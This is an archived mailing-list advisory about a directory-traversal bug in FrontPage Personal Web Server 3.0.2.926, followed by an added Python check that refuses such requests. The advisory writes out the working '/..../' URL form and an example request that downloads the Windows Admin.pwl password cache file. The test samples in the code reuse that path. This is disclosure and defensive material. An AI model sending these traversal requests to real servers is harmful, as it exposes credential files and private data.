Description: Doubledot bug in FrontPage Personal Web Server.
Compromise: Accessing drive through browser.
Vulnerable Systems: Frontpage-PWS32/3.0.2.926; other versions not tested.

Details:
When FrontPage-PWS runs a site on your c:\ drive, your drive could be accessed by any user accessing your page, simply by requesting any file in any directory except the files in the FrontPage dir., especially /_vti_pvt/.

How to exploit this bug?
Simply by adding /..../ in the URL address bar.

http://www.target.com/..../<any_dir>/<any_file>

So by requesting http://www.target.com/..../Windows/Admin.pwl the webserver lets us download the .pwl file from the target.

Files and dirs. with the hidden attribute set are vulnerable.

Solution:
The best solution is installing FrontPage on a drive that doesn't contain private information.

Greetings,

Jan van de Rijt aka The Warlock.
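A server-side check for the request pattern described in this advisory, as an added example that is not part of the original message or of FrontPage: it refuses any URL path containing a segment made only of dots (`..`, `....`, also in percent-encoded form) and then confirms that the resolved path stays under the document root. The function name `resolve_request_path` and the `/srv/www` root are assumptions chosen for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# A segment made only of dots (".", "..", "....", optionally padded with
# spaces) is treated as directory navigation and refused outright. This is
# deliberately strict: a harmless "/./" is rejected as well.
DOT_SEGMENT = re.compile(r"^\s*\.+[\s.]*$")


def resolve_request_path(url_path, doc_root="/srv/www"):
    """Map a URL path to a path under doc_root, or return None to refuse.

    doc_root is a hypothetical value used for this example.
    """
    # Decode repeatedly so %2e%2e and double-encoded %252e%252e become dots.
    decoded = url_path
    for _ in range(3):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    else:
        return None  # still changing after three passes: refuse

    if "\x00" in decoded:
        return None

    # Split on both separators, since a Windows server accepts backslashes.
    segments = [s for s in re.split(r"[/\\]+", decoded) if s]
    if any(DOT_SEGMENT.match(s) for s in segments):
        return None

    # Second layer: the normalised result must still sit under the root.
    root = posixpath.normpath(doc_root)
    candidate = posixpath.normpath(posixpath.join(root, *segments))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests; the second is the form from the advisory.
    for path in ["/index.html", "/..../Windows/Admin.pwl",
                 "/%2e%2e%2e%2e/Windows/Admin.pwl", "/docs/v1.2/readme.txt"]:
        print(path, "->", resolve_request_path(path))
```

Rejecting dot-only segments before normalisation matters because a generic normaliser only understands `.` and `..`, and would pass `....` through as an ordinary directory name.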
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:35:08 PDT